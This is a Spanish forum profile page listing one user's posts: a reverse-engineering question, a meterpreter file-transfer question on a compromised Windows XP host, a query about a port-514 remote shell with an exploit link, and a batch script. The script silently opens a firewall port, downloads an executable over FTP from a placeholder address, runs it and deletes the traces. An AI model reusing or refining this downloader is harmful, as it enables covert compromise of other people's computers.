elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Temas
Páginas: [1]
1  Programación / Ingeniería Inversa / OllyDBG Registros en: 20 Diciembre 2012, 19:01 pm
Hola, estoy estudiando ingeniería inversa con OllyDBG y me hago una pregunta. ¿Como se diferencia en los registros una dirección de memoria de un valor?
Un saludo!
2  Seguridad Informática / Hacking / Transferencia de archivos con meterpreter en: 30 Mayo 2010, 17:59 pm
hola a todos, tengo una sesion con meterpreter abierta y tengo varias dudas.

Uso backtrack 4 y la session está abierta en un windows xp SP2.

1ª no puedo cambiar de directorio en meterpreter. Hago ls despues cd <directorio> y me sale este error stdapi_fs_chdir : operation failed: 2

2º abro la shell e intento descargar un archivo con tftp. Ejecuto el servidor tftp en backtrack y escribo los comandos en la shell: tftp -i xxx.xxx.xxx.xxx PUT archivo.exe /root/ y me dice q no se puede escribir o acceso violado


Un saludo y a ver si me podeis resolver las dudas y puedo subir y bajar archivos!
3  Seguridad Informática / Hacking / Puerto 514/tcp shell en: 2 Marzo 2010, 14:55 pm
Hola, alguno sabe como establecer una conexion con ese puerto??
Al parecer corre en un sistema windows. He probado con netcat y telnet y no establece conexión.

Google dice:
 
514 shell Comando remoto, sin password!

Existe un exploit:

http://www.exploit-db.com/exploits/4222

pero no me sirve, alguna idea??
4  Programación / Scripting / Pregunta sobre script (descarga de archivo en ftp) en: 23 Noviembre 2009, 17:22 pm
Hola, soy nuevo en esto del batch. Estoy creando un script para q se descarge un archivo a traves de ftp. El script es este:
@echo off
netsh firewall add portopening all puerto nombre>nul
echo open > "c:\ftptexto.txt"
echo direccion ip >> "c:\ftptexto.txt"
echo usuario>> "c:\ftptexto.txt"
echo contraseña>> "c:\ftptexto.txt"
echo lcd "c:\" >> "c:\ftptexto.txt"
echo get archivo.exe >> "c:\ftptexto.txt"
echo close >> "c:\ftptexto.txt"
echo bye >> "c:\ftptexto.txt"
ftp -s:c:\ftptexto.txt>nul
cd "c:\"
archivo.exe
ping localhost -n 10>nul
del /f /q "c:\archivo.exe">nul
del /f /q "c:\ftptexto.txt">nul
exit
Funciona perfectamente, el problema es q cuando no esta disponible el servidor salta un error, hasta ahi bien, pero me crea el ftptexto.txt y el archivo.exe y no me los borra. ¿Que deberia hacer para q me los borrase cuando el servidor estubiera desconectado?
Un saludo a todos y gracias!!!!
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines